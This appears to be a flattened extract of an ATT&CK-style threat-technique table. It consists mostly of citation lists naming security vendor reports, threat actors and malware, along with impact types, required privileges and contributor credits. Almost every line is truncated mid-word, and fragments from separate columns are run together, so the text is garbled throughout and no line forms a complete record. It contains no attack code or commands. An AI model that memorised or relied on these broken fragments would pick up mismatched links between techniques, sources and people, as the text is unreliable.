h, Microsoft (Citation: Trend Micro DRBControl February 2020),(Citation: Mandiant_UNC2165),(Citation: objsee mac
(Citation: synack 2016 review),
a Peter Bansode; Uriel Kosayev; (Citation: Talos Group123),(Citation: GitHub LaZagne Dec 2018),(Citation: GitHub PowerSploit May 2012)
Availability (Citation: Mandiant-Sandworm-Ukraine-2022),(Citation: ESEST Black Energy Jan 2016),(Citation: ESET Ca
Availability ,(Citation: Ready.gov IT DRP)
(Citation: Anomali Linux Rabbit 2018),(Citation: Forcepoint Monsoon),(Citation: Cisco H1N1 Part 2),(Citati
(Citation: MoustachedBouncer ESET August 2023),(Citation: NCSC Cyclops Blink February 2022),(Citation
(Citation: ESET ForSSHe December 2018),(Citation: Forcepoint Felismus Mar 2017),(Citation: Malwarebyt
Availability (Citation: Malwarebytes AvosLocker Jul 2021),(Citation: CISA Iran Albanian Attacks September 2022),(Cit
Integrity (Citation: Sygnia Elephant Beetle Jan 2022),(Citation: Ready.gov IT DRP)
Integrity (Citation: FireEye APT38 Oct 2018),
Integrity (Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: FireEye APT38 Oct 2018),(Citation: Unit
Integrity (Citation: ESET LightNeuron May 2019),(Citation: FireEye APT38 Oct 2018),(Citation: Fortinet Metamorfo
(Citation: Check Point APT34 April 2021),(Citation: Kaspersky ToddyCat June 2022),(Citation: Unit42 RDA
(Citation: ESET PLEAD Malware July 2018),(Citation: FireEye APT28),(Citation: MSTIC NOBELIUM Mar 202
g Threats Team, Proofpoint (Citation: Mandiant APT41),(Citation: MAR10135536-B),(Citation: Zscaler Higaisa 2020),(Citation: Novetta
(Citation: FireEye SUNBURST Additional Details Dec 2020),(Citation: Trend Micro Daserf Nov 2017),(Citati
(Citation: CISA Scattered Spider Advisory November 2023),(Citation: SOCRadar INC Ransom January 2024
(Citation: Talos NavRAT May 2018),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: Mandiant FIN5 G
(Citation: MoustachedBouncer ESET August 2023),(Citation: McAfee Night Dragon),(Citation: NCC Group
(Citation: ESET Turla Lunar toolset May 2024),(Citation: ESET ForSSHe December 2018),(Citation: Rclone)
Netskope; Praetorian (Citation: GitHub Pacu),(Citation: Peirates GitHub),(Citation: CISA Scattered Spider Advisory November 20
,(Citation: US-CERT-TA18-106A),(Citation: US-CERT TA17-156A SNMP Abuse 2017),(Citation: Cisco Blog Le
,(Citation: Cisco Securing SNMP),(Citation: US-CERT TA17-156A SNMP Abuse 2017),(Citation: Cisco Blog L
,(Citation: US-CERT-TA18-106A),(Citation: US-CERT TA17-156A SNMP Abuse 2017),(Citation: Cisco Blog Le
Stojadinovic; Naveen Vijayaraghav(Citation: Visa FIN6 Feb 2019),(Citation: Sekoia Raccoon2 2022),(Citation: ESET EvasivePanda 2023),(Citati
Liburdi, @jshlbrd; Toby Kohlenbe(Citation: Rostovcev APT41 2021),(Citation: CISA Scattered Spider Advisory November 2023),(Citation: M
(Citation: MSTIC DEV-0537 Mar 2022),
,
(Citation: MSTIC DEV-0537 Mar 2022),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Cita
(Citation: RSAC 2015 Abu Dhabi Stefano Maccaglia),(Citation: NCC Group Chimera January 2021),(Citatio
Privileges to access certain files (Citation: Überwachung APT28 Forfiles June 2015),(Citation: ESET ForSSHe December 2018),(Citation: Ka
Privileges to access network sha(Citation: DFIR Conti Bazar Nov 2021),(Citation: Symantec Sowbug Nov 2017),(Citation: Secureworks BRO
Privileges to access removable m(Citation: ESET Machete July 2019),(Citation: Kaspersky Sofacy),(Citation: Kaspersky TajMahal April 2019)
(Citation: ClearSky Lazarus Aug 2020),(Citation: Latrodectus APR 2024),(Citation: Talos Group123),(Citatio
Integrity ,(Citation: Ready.gov IT DRP)
Integrity (Citation: Cadet Blizzard emerges as novel threat actor),(Citation: US District Court Indictment GRU Unit
Integrity (Citation: Novetta Blockbuster Destructive Malware),(Citation: Microsoft Albanian Government Attacks S
ard; Red Canary (Citation: Symantec Sowbug Nov 2017),(Citation: TrendMicro Gamaredon April 2020),(Citation: Malware
(Citation: Peirates GitHub),(Citation: Trend Micro TeamTNT),(Citation: Intezer Doki July 20),(Citation: Aqu
(Citation: VirusBulletin Kimsuky October 2019),(Citation: Microsoft Moonstone Sleet 2024),
(Citation: Bitdefender StrongPity June 2020),(Citation: ESET Lazarus Jun 2020),(Citation: ESET EvasivePan
(Citation: PWC WellMess C2 August 2020),(Citation: Talos Promethium June 2020),(Citation: Cisco Talos T
(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),
(Citation: Unit 42 Hildegard Malware),(Citation: FBI Flash FIN7 USB),(Citation: Microsoft Moonstone Slee
(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: Cybereason INC Ransomware Novembe
on OverWatch (Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: LOLBAS Esentutl),(Citation
Availability ,(Citation: Ready.gov IT DRP)
Availability (Citation: AcidRain JAGS 2022),(Citation: Sophos BlackCat Jul 2022),(Citation: Symantec Elfin Mar 2019),(
Availability (Citation: CISA Iran Albanian Attacks September 2022),(Citation: Symantec Elfin Mar 2019),(Citation: Fire
rosoft; ExtraHop; Mnemonic; Re (Citation: DFIR_Sodinokibi_Ransomware),(Citation: BitDefender BADHATCH Mar 2021),(Citation: NCC Gr
,(Citation: Wald0 Guide to GPOs),(Citation: Microsoft GPO Security Filtering),(Citation: GitHub Bloodhoun
(Citation: Mandiant-Sandworm-Ukraine-2022),(Citation: Cybereason Egregor Nov 2020),(Citation: Micros
(Citation: CISA Scattered Spider Advisory November 2023),(Citation: AADInternals Documentation),(Citati
y Developer Platform Services (ID (Citation: FireEye APT37 Feb 2018),(Citation: Cisco Group 72),(Citation: objective-see windtail1 dec 2018
(Citation: Volexity SolarWinds),(Citation: CheckPoint Redaman October 2019),(Citation: McAfee Maze M
(Citation: Meyers Numbered Panda),
n Benson, Exabeam; Sylvain Gil, (Citation: Securelist ShadowPad Aug 2017),(Citation: Zdnet Ngrok September 2018),(Citation: ESET Grand
(Citation: Trend Micro TA505 June 2019),(Citation: Gh0stRAT ATT March 2019),(Citation: unit42_gamare
Prabakaran, Microsoft Threat Intel(Citation: CISA Scattered Spider Advisory November 2023),(Citation: DOJ Iran Indictments March 2018),(C
ch, CardinalOps; Microsoft Securi (Citation: CISA Star Blizzard Advisory December 2023),(Citation: DOJ Iran Indictments March 2018),(Citati
(Citation: ESET Turla Lunar toolset May 2024),(Citation: NCC Group Chimera January 2021),(Citation: Man
(Citation: Volexity Exchange Marauder March 2021),(Citation: CISA Iran Albanian Attacks September 202
(Citation: Threatpost Lizar May 2021),(Citation: ESET DazzleSpy Jan 2022),(Citation: DFIR Phosphorus Nov
(Citation: Fidelis Hi-Zor),(Citation: Lumen Versa 2024),(Citation: Cybersecurity Advisory SVR TTP May 202
(Citation: Unit 42 Bisonal July 2018),(Citation: ESET ForSSHe December 2018),(Citation: Forcepoint Felism
Availability (Citation: Talos ZxShell Oct 2014),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(
Availability ,(Citation: CERT-EU DDoS March 2017)
Availability (Citation: ESET Industroyer),(Citation: CERT-EU DDoS March 2017)
Availability ,(Citation: CERT-EU DDoS March 2017)
Availability ,(Citation: CERT-EU DDoS March 2017)
(Citation: Peirates GitHub),(Citation: Unit 42 Hildegard Malware),(Citation: Aqua TeamTNT August 2020),
(Citation: FireEye APT17),(Citation: CISA GRU29155 2024),(Citation: ClearSky Pay2Kitten December 2020
,
(Citation: McAfee Honeybee),(Citation: CISA Star Blizzard Advisory December 2023),(Citation: Mandiant A
(Citation: ClearSky Lazarus Aug 2020),(Citation: ESET Lazarus Jun 2020),(Citation: Microsoft Iranian Threa
(Citation: GitHub Pacu),(Citation: Lumen KVBotnet 2023),
SYSTEM (Citation: Mandiant No Easy Breach),(Citation: FireEye APT41 Aug 2019),(Citation: Novetta-Axiom),(Citati
Administra(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Windows Commands JPCERT),(Citation: NS
Secure boot disabled Administra(Citation: Palo Alto T9000 Feb 2016),(Citation: Eset Ramsay May 2020),(Citation: Trustwave Cherry Picke
(Citation: Trustwave Pillowmint June 2020),(Citation: FireEye FIN7 Shim Databases),(Citation: FOX-IT May
(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Securelist Kimsuky Sept 2013),
(Citation: ESET Turla Mosquito Jan 2018),(Citation: HP SVCReady Jun 2022),(Citation: Talos Seduploader O
,
(Citation: Proofpoint TA505 October 2019),(Citation: FireEye TRITON 2019),(Citation: Microsoft Deep Div
root (Citation: ObjectiveSee AppleJeus 2019),
,
(Citation: Demaske Netsh Persistence),
(Citation: ESET Turla PowerShell May 2019),
(Citation: ESET Gazer Aug 2017),(Citation: TechNet Screensaver GP)
,
gnacio, @ch4ik0; Eduardo Gonzál ,
(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: RotaJakiro 2021 netlab360 analysis),
(Citation: BitDefender BADHATCH Mar 2021),(Citation: Secureworks BRONZE PRESIDENT December 2019
(Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: CISA Iran Albanian Attacks September 2022),(Citati
(Citation: Kaspersky Gauss Whitepaper),(Citation: Kaspersky ToddyCat June 2022),(Citation: Zscaler Pikab
rporation India; Nagahama Hiroki(Citation: SecureWorks September 2019),(Citation: ESET Gazer Aug 2017),(Citation: FireEye Poison Ivy),(C
(Citation: 20 macOS Common Tools and Techniques),(Citation: ESET Kobalos Feb 2021),(Citation: Symant
(Citation: DFIR_Sodinokibi_Ransomware),(Citation: PWC Yellow Liderc 2023),(Citation: Rclone),(Citation:
,(Citation: TechNet Firewall Design)
(Citation: Microsoft BITSAdmin),(Citation: Symantec Elfin Mar 2019),(Citation: Bitdefender Agent Tesla A
(Citation: CISA Iran Albanian Attacks September 2022),(Citation: ESET Grandoreiro April 2020),(Citation: E
,(Citation: Microsoft GPO Bluetooth FEB 2009),(Citation: TechRepublic Wireless GPO FEB 2009)
(Citation: Symantec Beetlejuice),
Presence of physical medium or ,(Citation: Microsoft Disable Autorun),(Citation: TechNet Removable Media Control)
Presence of physical medium or (Citation: Securelist Agent.btz),(Citation: FireEye APT30),(Citation: ESET Machete July 2019),(Citation: Kas
(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: Google Iran Threats October 2021),(Citation: Man
eat Intelligence; Yossi Weizman, M,
(Citation: Trend Micro DRBControl February 2020),(Citation: NCC Group Chimera January 2021),(Citation
(Citation: Github PowerShell Empire),
,
re Defender Research Team (Citation: CISA Iran Albanian Attacks September 2022),(Citation: Sygnia Elephant Beetle Jan 2022),(Citatio
Remote exploitation for executio(Citation: IssueMakersLab Andariel GoldenAxe May 2017),(Citation: Cisco Talos Bitter Bangladesh May 20
Intelligence Center; Mohit Ratho,(Citation: Comparitech Replay Attack),(Citation: Ars Technica Pwn2Own 2017 VM Escape),(Citation: Tech
Intelligence Center (Citation: Microsoft SIR Vol 19),(Citation: Bitdefender APT28 Dec 2015),(Citation: Ars Technica Pwn2Own
User (Citation: MoustachedBouncer ESET August 2023),(Citation: FireEye APT32 May 2017),(Citation: Unit 42
Unpatched software or otherwise (Citation: FireEye APT28),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: ESET Tri
Ariel Shuper, Cisco; Brad Geesa (Citation: DarkReading FireEye FIN5 Oct 2015),(Citation: Unit 42 Hildegard Malware),(Citation: RSA2017 D
(Citation: Securelist BlackEnergy Nov 2014),(Citation: Fidelis Turbo),(Citation: ESET Machete July 2019),(C
(Citation: FireEye APT32 May 2017),(Citation: Symantec Sowbug Nov 2017),(Citation: Microsoft WhisperG
; Jan Miller, CrowdStrike ,(Citation: create_sym_links)
(Citation: 20 macOS Common Tools and Techniques),(Citation: ANSSI Sandworm January 2021),(Citation:
(Citation: ANSSI RYUK RANSOMWARE),(Citation: ESET Grandoreiro April 2020),(Citation: Microsoft BlackC
Availability (Citation: BushidoToken Akira 2023),(Citation: Bleeping Computer INC Ransomware March 2024),(Citatio
Availability (Citation: Eclypsium Trickboot December 2020),(Citation: Secure List Bad Rabbit),
shu_C; Teodor Cimpoesu (Citation: US-CERT TA18-074A),(Citation: Gigamon Berserk Bear October 2021),(Citation: Unit 42 Phisher
,(Citation: FireEye ADFS),(Citation: Microsoft SolarWinds Customer Guidance),(Citation: Crowdstrike AWS
ender; Jack Burns, HubSpot; Oleg (Citation: Secureworks IRON RITUAL Profile),(Citation: Microsoft - Customer Guidance on Recent Nation-
(Citation: Volexity SolarWinds),
(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),
(Citation: Microsoft HAFNIUM March 2020),
,
,
(Citation: TrendMicro New Andariel Tactics July 2018),(Citation: US District Court Indictment GRU Unit 74
ligence Center (MSTIC); Obsidian (Citation: ClearSky Lazarus Aug 2020),(Citation: Proofpoint TA453 July2021),(Citation: CISA Star Blizzard A
Massimo Giaimo, Würth Group Cyb(Citation: Microsoft Iranian Threat Actor Trends November 2021),(Citation: NCC Group Chimera January
ligence Center (MSTIC) (Citation: Volexity Exchange Marauder March 2021),(Citation: Google Iran Threats October 2021),(Citatio
(Citation: KISA Operation Muzabi),(Citation: US District Court Indictment GRU Unit 74455 October 2020),
(Citation: Volexity Exchange Marauder March 2021),(Citation: CISA AA24-038A PRC Critical Infrastructure
ligence Center (MSTIC) ,(Citation: DNS-msft)
ligence Center (MSTIC) (Citation: Azure AD Recon),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citatio
(Citation: Volexity Exchange Marauder March 2021),(Citation: Google Iran Threats October 2021),(Citatio
(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),
(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: Mandiant FIN13 Aug 2022
,
(Citation: ClearSky Lazarus Aug 2020),(Citation: KISA Operation Muzabi),(Citation: Microsoft Moonstone
(Citation: MSTIC DEV-0537 Mar 2022),(Citation: US District Court Indictment GRU Unit 74455 October 20
(Citation: Google Iran Threats October 2021),
,
(Citation: ClearSky Lazarus Aug 2020),(Citation: ESET Lazarus Jun 2020),(Citation: MSTIC DEV-0537 Mar 2
@_w0rk3r; Ted Samuels, Rapid7 (Citation: ESET Turla Lunar toolset May 2024),(Citation: Emissary Trojan Feb 2016),(Citation: ESET ComRA
(Citation: Securelist DarkVishnya Dec 2018),(Citation: Wikipedia 802.1x)
(Citation: 20 macOS Common Tools and Techniques),(Citation: sentinelone shlayer to zshlayer),(Citation:
h, CardinalOps (Citation: FireEye Hacking FIN4 Dec 2014),(Citation: MSTIC Octo Tempest Operations October 2023),(Cita
(Citation: ESET Turla Lunar toolset May 2024),(Citation: Microsoft File Folder Exclusions)
(Citation: Kaspersky ProjectSauron Full Report),(Citation: ESET ComRAT May 2020),(Citation: Kaspersky E
(Citation: Trend Micro DRBControl February 2020),(Citation: ESET Machete July 2019),(Citation: QiAnXin
(Citation: KISA Operation Muzabi),(Citation: US-CERT TA18-074A),(Citation: FireEye SMOKEDHAM June 2
(Citation: MoustachedBouncer ESET August 2023),(Citation: Palo Alto Sofacy 06-2018),(Citation: FireEye
(Citation: Deep Instinct BPFDoor 2023),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Shla
NTFS partitioned hard drive (Citation: ESET LoJax Sept 2018),(Citation: Unit 42 Valak July 2020),(Citation: Volexity PowerDuke Novem
(Citation: FireEye FiveHands April 2021),(Citation: Cobalt Strike Manual 4.3 November 2020),
(Citation: sentinellabs resource named fork 2020),(Citation: tau bundlore erika noerenberg 2020),(Citatio
(Citation: ESET LoudMiner June 2019),(Citation: Sophos Maze VM September 2020),(Citation: Sophos Rag
MS Office version specified in ,(Citation: Microsoft Disable VBA Jan 2020)
n Porcilan; Matt Mullins (Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Trellix Darkgate 2023),(Citation: NCSC
(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Mandiant APT41),(Citation: Cybe
(Citation: PWC Yellow Liderc 2023),
(Citation: RedCanary Mockingbird May 2020),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: NS
rina Liang; Stefan Kanthak; Travis (Citation: ESET Exchange Mar 2021),(Citation: GitHub PowerSploit May 2012),(Citation: ESET EvilNum Jul
(Citation: Dell Sakula),(Citation: Unit42 Emissary Panda May 2019),(Citation: Sygnia Elephant Beetle Jan 2
(Citation: Github PowerShell Empire),
(Citation: Unit 42 Hildegard Malware),(Citation: ESET Ebury May 2024),(Citation: ESET Ebury Oct 2017),(C
Administra,(Citation: Executable Installers are Vulnerable),(Citation: Powersploit)
(Citation: Lazarus APT January 2022),(Citation: Qualys LolZarus),(Citation: FinFisher exposed ),
(Citation: GitHub PowerSploit May 2012),(Citation: Github PowerShell Empire),(Citation: PowerSploit Do
Administra(Citation: GitHub PowerSploit May 2012),(Citation: Github PowerShell Empire),(Citation: PowerSploit Do
(Citation: GitHub PowerSploit May 2012),(Citation: Github PowerShell Empire),(Citation: PowerSploit Do
Administra(Citation: F-Secure BlackEnergy 2014),(Citation: Executable Installers are Vulnerable),(Citation: Powerspl
SYSTEM (Citation: McAfee Honeybee),
Unit 42; Liran Ravich, CardinalOps(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chie
adanala, Cigna Information Prote (Citation: Microsoft Albanian Government Attacks September 2022),(Citation: Wevtutil Microsoft Docum
(Citation: GitHub Pacu),(Citation: Expel IO Evil in AWS)
agan, CISA; Ibrahim Ali Khan; (Citation: GitHub Pacu),(Citation: Mandiant APT29 Microsoft 365 2022),
(Citation: ESET Ebury May 2024),
(Citation: US-CERT TYPEFRAME June 2018),(Citation: NCSC Cyclops Blink February 2022),(Citation: ESET G
ey; Daniel Feichter, @VirtualAll (Citation: ESET Grandoreiro April 2020),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Fortinet
niel Feichter, @VirtualAllocEx, In (Citation: Github_SILENTTRINITY),(Citation: Chromium HSTS)
e Kenning, Sophos; Vikas Singh, (Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: CISA AA20-239A BeagleBoyz August 2020)
(Citation: Rostovcev APT41 2021),(Citation: Mandiant Pulse Secure Update May 2021),(Citation: ESET Eb
(Citation: Avertium Black Basta June 2022),(Citation: Trend Micro Black Basta May 2022),(Citation: Costa
,
ntelligence; Pawel Partyka, Micros(Citation: ClearSky Lazarus Aug 2020),(Citation: ESET Lazarus Jun 2020),(Citation: CISA Scattered Spider A
,(Citation: Content trust in Docker),(Citation: Content trust in Azure Container Registry)
ender; Brad Geesaman, @bradgee(Citation: Donut Github),(Citation: FireEye Metamorfo Apr 2018),(Citation: Prevailion EvilNum May 2020
e Kenning, Sophos; Vikas Singh, (Citation: Unit 42 Hildegard Malware),(Citation: ESET Kobalos Feb 2021),(Citation: Mandiant Pulse Secure
(Citation: Aqua TeamTNT August 2020),(Citation: ESET DazzleSpy Jan 2022),(Citation: Anomali Rocke Mar
(Citation: ESET Turla Lunar toolset May 2024),(Citation: Volexity SolarWinds),(Citation: Cybereason Coba
(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: Microsoft Deep Dive Solorigate Januar
(Citation: Cylance Dust Storm),(Citation: Trustwave Pillowmint June 2020),(Citation: ESET RTM Feb 2017)
(Citation: FireEye APT32 May 2017),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: Sym
(Citation: FireEye APT32 May 2017),(Citation: Unit 42 Bisonal July 2018),(Citation: CISA Iran Albanian Atta
Established network share conne(Citation: CarbonBlack RobbinHood May 2019),(Citation: Google Cloud APT41 2024),(Citation: Technet N
ng, Huntress ,
Romain Dumont, ESET (Citation: MoustachedBouncer ESET August 2023),(Citation: NCSC Cyclops Blink February 2022),(Citation
hew Demaske, Adaptforward (Citation: Qualys LolZarus),(Citation: VectorSec ForFiles Aug 2017),(Citation: trendmicro_redcurl),(Citatio
es; Joe Wise; John Page (aka hyp3rl(Citation: TrendMicro Gamaredon April 2020),(Citation: Microsoft WhisperGate January 2022),(Citation:
Availability (Citation: CISA Iran Albanian Attacks September 2022),(Citation: Trend Micro Black Basta Spotlight Septe
Intelligence Center (Citation: ESET Kobalos Feb 2021),(Citation: FBI FLASH APT39 September 2020),(Citation: SentinelLabs M
(Citation: TrendMicro Ursnif Mar 2015),(Citation: Securelist Sofacy Feb 2018),(Citation: Prevx Carberp M
(Citation: FireEye Hacking FIN4 Video Dec 2014),(Citation: FireEye Hacking FIN4 Dec 2014),(Citation: Kand
(Citation: Talos NavRAT May 2018),(Citation: Symantec Sowbug Nov 2017),(Citation: EST Kimsuky April 2
An externally facing login portal (Citation: CrowdStrike IceApple May 2022),(Citation: Mandiant Cutting Edge January 2024),(Citation: Trit
(Citation: ESET Turla Lunar toolset May 2024),(Citation: Kaspersky ToddyCat June 2022),(Citation: Mandi
(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: ESET Trickbot Oct 2020),(Citation
(Citation: Palo Alto Sofacy 06-2018),(Citation: Accenture MUDCARP March 2019),(Citation: McAfee APT2
,
Threat Intelligence Center (MSTI (Citation: ClearSky Lazarus Aug 2020),(Citation: KISA Operation Muzabi),(Citation: SecureWorks August 2
(Citation: CISA Iran Albanian Attacks September 2022),(Citation: Mandiant-Sandworm-Ukraine-2022),(Cit
(Citation: GitHub Pacu),(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023),(Citation: Mandia
wire; Elastic; Felipe Espósito, @ (Citation: McAfee Honeybee),(Citation: Trend Micro DRBControl February 2020),(Citation: Secureworks B
(Citation: Sandfly BPFDoor 2022),
(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: Anomali MUSTANG PANDA October 2019
(Citation: objective-see windtail1 dec 2018),(Citation: SANS Windshift August 2018),(Citation: McAfee Ne
(Citation: Microsoft Iranian Threat Actor Trends November 2021),(Citation: aptsim),(Citation: Kaspersky F
ke Falcon OverWatch (Citation: ESET Lazarus Jun 2020),(Citation: RedCanary RaspberryRobin 2022),(Citation: Trend Micro Mac
(Citation: FireEye APT32 May 2017),(Citation: Mandiant-Sandworm-Ukraine-2022),(Citation: Symantec O
Weizman, Azure Defender Resea (Citation: CISA Iran Albanian Attacks September 2022),(Citation: Symantec Sowbug Nov 2017),(Citation: E
(Citation: Symantec Daggerfly 2023),(Citation: Cybereason Soft Cell June 2019),(Citation: Twitter ItsReally
(Citation: Mandiant Operation Ke3chang November 2014),(Citation: TrendMicro BlackTech June 2017),(C
(Citation: synack 2016 review),
(Citation: ESET ForSSHe December 2018),(Citation: ESET Ebury Feb 2014),(Citation: Mandiant FIN13 Aug
(Citation: MSTIC Octo Tempest Operations October 2023),
(Citation: Dell Skeleton),(Citation: Cycraft Chimera April 2020),(Citation: TechNet Least Privilege),(Citation
(Citation: MagicWeb),(Citation: AADInternals Azure AD On-Prem to Cloud),(Citation: Mandiant Azure AD
ch, CardinalOps; Muhammad Mo (Citation: CISA Scattered Spider Advisory November 2023),(Citation: Mandiant Pulse Secure Zero-Day Ap
(Citation: Mandiant - Synful Knock),(Citation: Mandiant Pulse Secure Zero-Day April 2021),(Citation: Cisco
; Jai Minton ,(Citation: EnableMPRNotifications)
(Citation: Kaspersky ProjectSauron Full Report),
Black; Scott Knight, @sdotknight (Citation: Trend Micro Skidmap),(Citation: ESET Ebury Oct 2017),
,(Citation: TechNet Least Privilege),(Citation: Microsoft Securing Privileged Access),(Citation: TechNet Cre
,(Citation: Mandiant M-Trends 2020)
(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Crowdstrike TELCO BPO Campaign December 2022),(Cita
(Citation: GitHub Pacu),(Citation: Mandiant M-Trends 2020)
(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Mandiant M-Trends 2020)
ntelligence; Blake Strom, Microsof,
,
,(Citation: AWS Management Account Best Practices),(Citation: AWS RE:Inforce Threat Detection 2024),(
wire; Travis Smith, Tripwire (Citation: FireEye APT32 May 2017),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: ESE
,(Citation: Cisco IOS Software Integrity Assurance - Credentials Management),(Citation: Cisco IOS Softwar
,(Citation: Cisco IOS Software Integrity Assurance - Credentials Management),(Citation: Cisco IOS Softwar
(Citation: Cisco Synful Knock Evolution),(Citation: Mandiant - Synful Knock),(Citation: Cisco IOS Software
Intelligence Center (Citation: Mandiant Pulse Secure Zero-Day April 2021),(Citation: NCC Group Chimera January 2021),(Cita
tein, Stern Security; Obsidian Se (Citation: CrowdStrike Scattered Spider BYOVD January 2023),(Citation: NCSC et al APT29 2024),(Citation
(Citation: Lazarus APT January 2022),(Citation: Talos MuddyWater May 2019),(Citation: Unit 42 Valak Jul
(Citation: Malwarebytes AvosLocker Jul 2021),(Citation: SecureList SynAck Doppelgänging May 2018),(Cit
(Citation: apt41_dcsocytec_dec2022),(Citation: NIST 800-63-3),(Citation: Cisco IOS Software Integrity Ass
,(Citation: NIST 800-63-3),(Citation: Cisco IOS Software Integrity Assurance - AAA),(Citation: Cisco IOS Soft
Availability (Citation: NKAbuse SL),(Citation: US District Court Indictment GRU Oct 2018),(Citation: Unit 42 Lucifer Jun
Availability ,(Citation: CERT-EU DDoS March 2017)
Availability ,(Citation: CERT-EU DDoS March 2017)
(Citation: Peirates GitHub),(Citation: CISA Iran Albanian Attacks September 2022),(Citation: Unit42 Emiss
(Citation: Joint CSA AvosLocker Mar 2022),(Citation: Malwarebytes AvosLocker Jul 2021),(Citation: BitDef
Network interface access and pa(Citation: FireEye APT28),(Citation: Symantec Elfin Mar 2019),(Citation: SecTools nbtscan June 2003),(Cit
(Citation: FireEye APT32 May 2017),(Citation: Microsoft PLATINUM June 2017),(Citation: Mandiant-Sand
(Citation: US-CERT TYPEFRAME June 2018),(Citation: NCSC Cyclops Blink February 2022),(Citation: Trustw
Labs; Tim (Wadhwa-)Brown; Vince(Citation: Symantec Sowbug Nov 2017),(Citation: FireEye APT40 March 2019),(Citation: Cybereason Coba
(Citation: GitHub LaZagne Dec 2018),
Labs; Tim (Wadhwa-)Brown; Yves (Citation: Symantec Elfin Mar 2019),(Citation: Symantec Leafminer July 2018),(Citation: GitHub LaZagne D
(Citation: GitHub Mimikatz lsadump Module),(Citation: NCSC Joint Report Public Tools),(Citation: TrendM
(Citation: Symantec Elfin Mar 2019),(Citation: FireEye APT35 2018),(Citation: CME Github September 201
Labs; Edward Millington; Michael (Citation: CISA Iran Albanian Attacks September 2022),(Citation: Sygnia Elephant Beetle Jan 2022),(Citatio
Access to Domain Controller or (Citation: Volexity Exchange Marauder March 2021),(Citation: NCC Group Chimera January 2021),(Citatio
(Citation: GitHub LaZagne Dec 2018),(Citation: Picus Labs Proc cump 2022),(Citation: MimiPenguin GitHu
Labs; Olaf Hartong, Falcon Force (Citation: Mandiant APT41),(Citation: Cybereason Soft Cell June 2019),(Citation: Mandiant APT1),(Citatio
ek; Red Canary (Citation: Malwarebytes AvosLocker Jul 2021),(Citation: SecureList SynAck Doppelgänging May 2018),(Cit
(Citation: FireEye APT28),(Citation: ESET Grandoreiro April 2020),(Citation: Trend Micro Qakbot May 202
(Citation: FireEye APT32 May 2017),(Citation: FireEye Obfuscation June 2017),(Citation: Picus Emotet De
Compiler software (either native(Citation: Prevailion DarkWatchman 2021),(Citation: MSTIC FoggyWeb September 2021),(Citation: Kaspe
(Citation: Lazarus APT January 2022),(Citation: Malwarebytes AvosLocker Jul 2021),(Citation: Latrodectus
(Citation: Mandiant APT41),(Citation: ESET ComRAT May 2020),(Citation: Microsoft Moonstone Sleet 202
; David Galazin @themalwareman1 (Citation: FireEye APT32 May 2017),(Citation: Unit 42 Bisonal July 2018),(Citation: CISA Iran Albanian Atta
n; Mark Wee; Simona David; Vito(Citation: US-CERT TYPEFRAME June 2018),(Citation: FireEye APT28),(Citation: Trend Micro DRBControl F
ve, Bank of Canada; Krishnan Subra (Citation: MSTIC Nobelium Toolset May 2021),(Citation: Deep Instinct Black Basta August 2022),(Citation
ms, Log analysis, Signature-based(Citation: Symantec Black Vine),(Citation: GitHub PowerSploit May 2012),(Citation: Cybereason Soft Cell
; Gregory Lesnewich, @greglesne ,
Active Defense Team, DBS Bank (Citation: Unit42 BendyBear Feb 2021),
(Citation: Cyble Egregor Oct 2020),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Cybereason Ba
(Citation: Talos Group123),(Citation: Kaspersky Andariel Ransomware June 2021),(Citation: Juniper IcedID
(Citation: SentinelOne Cuckoo Stealer May 2024),(Citation: SentinelLabs reversing run-only applescripts 2
,
,
(Citation: ESET Lazarus Jun 2020),(Citation: CISA Iran Albanian Attacks September 2022),(Citation: Lunghi
(Citation: ESET PLEAD Malware July 2018),(Citation: McAfee Honeybee),(Citation: Kaspersky LuminousM
(Citation: KISA Operation Muzabi),(Citation: CISA GRU29155 2024),
(Citation: NCC Group TA505),(Citation: Mandiant APT1),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: R
(Citation: FireEye APT32 May 2017),(Citation: CISA Iran Albanian Attacks September 2022),(Citation: Unit
(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: US District Court Indictme
t Intelligence Center (MSTIC); Nic(Citation: Cybereason Oceanlotus May 2017),(Citation: ESET Gamaredon June 2020),(Citation: Cybereaso
(Citation: Talos Bisonal Mar 2020),(Citation: CheckPoint Naikon May 2020),(Citation: ESET Turla Lunar too
(Citation: Talos Cobalt Strike September 2020),(Citation: Reaqta MuddyWater November 2017),(Citation
(Citation: Palo Alto Office Test Sofacy),(Citation: win10_asr),(Citation: Palo Alto Office Test Sofacy)
(Citation: SensePost Ruler GitHub),(Citation: SensePost Outlook Forms),(Citation: win10_asr),(Citation: Se
